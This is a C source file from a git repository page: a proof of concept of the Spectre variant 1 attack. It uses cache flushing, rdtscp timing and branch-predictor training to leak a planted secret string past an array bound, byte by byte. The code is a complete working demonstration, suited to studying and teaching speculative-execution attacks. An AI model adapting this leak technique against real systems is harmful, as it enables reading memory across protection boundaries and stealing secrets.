sk4nz/octopus
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
6c445d1339
octopus/spectre.c

273 lines
6.5 KiB
C
Raw Normal View History

first
2022-01-22 15:04:17 +01:00
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
#if defined(__i386__) || defined(__amd64__)
#define CACHELINESIZE 64
static int _has_rdtscp;
#else
#error "unsupported architecture"
#endif
#if defined(__i386__)
#define PUSH(r) "pushl %%e" #r "x\n"
#define POP(r) "popl %%e" #r "x\n"
#elif defined(__amd64__)
#define PUSH(r) "pushq %%r" #r "x\n"
#define POP(r) "popq %%r" #r "x\n"
#endif
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];
uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */
unsigned cache_hit_threshold;
int verbose;
static inline unsigned
timedaccess(volatile uint8_t *addr)
{
uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
unsigned int junk = junk;
if (_has_rdtscp) {
t0 = __rdtscp(& junk);
junk |= *addr;
t1 = __rdtscp(& junk);
} else {
t0 = __rdtsc();
junk |= *addr;
t1 = __rdtsc();
}
return (unsigned)(t1 - t0);
}
static void
calibrate_clock(int verbose, unsigned int *threshold)
{
volatile char buf[2 * CACHELINESIZE];
volatile uint8_t *bufp;
__attribute__((unused)) volatile int junk = 0;
int i;
const int cnt = 1000;
uint64_t tcache, tmem;
unsigned cap;
__asm__ volatile (
PUSH(a)
PUSH(b)
PUSH(c)
PUSH(d)
"mov $0x80000001,%%eax\n"
"mov $0,%%ecx\n"
"cpuid\n"
"mov %%edx,%0\n"
POP(d)
POP(c)
POP(b)
POP(a)
: "=m" (cap)
/*
* clang sometimes stores the result using an offset relative to
* %esp! That won't work, because we modify %esp with push and pop.
* Hence, prevent them compiler from using %esp!
*/
:: "esp" );
#define HAVE_RDTSCP (1U << 27)
if (cap & HAVE_RDTSCP) {
if (verbose)
printf("CPU has RDTSCP\n");
_has_rdtscp = 1;
} else {
if (verbose)
printf("WARNING: CPU has no RDTSCP support, using RDTSC.\n");
_has_rdtscp = 0;
}
/* On i386 PIC we have to preserve %ebx, too */
__asm__ volatile (
PUSH(a)
PUSH(b)
PUSH(c)
PUSH(d)
"mov $0x7,%%eax\n"
"mov $0,%%ecx\n"
"cpuid\n"
"mov %%ebx, %0\n"
POP(d)
POP(c)
POP(b)
POP(a)
: "=m" (cap)
:: "esp" );
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINESIZE) &
~(CACHELINESIZE - 1)));
junk |= *bufp;
for (i = 0, tcache = 0; i < cnt; i++)
tcache += timedaccess(bufp);
tcache /= cnt;
for (i = 0, tmem = 0; i < cnt; i++) {
_mm_clflush((const void *)bufp);
_mm_mfence();
tmem += timedaccess(bufp);
}
tmem /= cnt;
if (threshold != NULL) {
*threshold = tcache + (tmem - tcache) / 2;
if (*threshold == (unsigned int)tmem)
(*threshold)--;
}
if (verbose) {
printf("Access time: memory %lu, cache %lu", tmem, tcache);
if (threshold)
printf(" -> threshold %d", *threshold);
printf("\n");
}
return;
}
void victim_function(size_t x) {
if (x < array1_size) {
temp &= array2[array1[x] * 512];
}
}
void
leak(
size_t malicious_x,
uint8_t value[2],
int score[2],
unsigned cache_hit_threshold
)
{
static int results[256];
int tries, i, j, mix_i;
unsigned int junk = 0;
size_t training_x, x;
register uint64_t time1, time2;
volatile uint8_t *addr;
for (i = 0; i < 256; i++)
results[i] = 0;
for (tries = 999; tries > 0; tries--) {
/* Flush array2[256*(0..255)] from cache */
for (i = 0; i < 256; i++)
_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size;
for (j = 29; j >= 0; j--) {
_mm_clflush(&array1_size);
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
//_mm_mfence(); NOT WORKING
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
/* Avoid jumps in case those tip off the branch predictor */
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));
/* Call the victim! */
victim_function(x);
}
/* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255;
addr = & array2[mix_i * 512];
time1 = __rdtscp(& junk); /* READ TIMER */
junk = *addr; /* MEMORY ACCESS TO TIME */
time2 = __rdtscp(& junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
if (time2 <= cache_hit_threshold && mix_i != array1[tries % array1_size])
results[mix_i]++; /* cache hit - add +1 to score for this value */
}
/* Locate highest & second-highest results tallies in j */
j = -1;
for (i = 0; i < 256; i++) {
if (j < 0 || results[i] >= results[j]) {
j = i;
}
}
if (results[j] == 3)
break;
}
results[0] ^= junk; /* use junk so code above wont get optimized out*/
value[0] = (uint8_t) j;
score[0] = results[j];
//value[1] = (uint8_t) k;
//score[1] = results[k];
}
int
main(int argc, char ** argv)
{
int o;
size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
int i, score[2], len = (int)strlen(secret);
uint8_t value[2];
unsigned sucesses = 0;
while ((o = getopt(argc, argv, "t:v")) != EOF) {
switch (o) {
case 't':
cache_hit_threshold = atoi(optarg);
break;
case 'v':
verbose++;
break;
default:
usage:
fprintf(stderr, "usage: %s [-v] "
"[-t threshold]\n", argv[0]);
return 2;
}
}
if (argc != optind)
goto usage;
calibrate_clock(verbose, cache_hit_threshold ? NULL : &cache_hit_threshold);
for (i = 0; i < (int)sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
if(verbose) {
printf("Threshold is: %d\n", cache_hit_threshold);
printf("Leaking %d bytes:\n", (int)strlen(secret));
}
while (--len >= 0) {
leak(malicious_x++, value, score, cache_hit_threshold);
if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
sucesses++;
fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
} else {
fprintf(stderr, "\033[31m?\033[0m");
}
}
fprintf(stderr, "\n");
printf("%.0f%%\n", 100 * sucesses / (float)strlen(secret));
_mm_mfence();
return 0;
}
Reference in New Issue Copy Permalink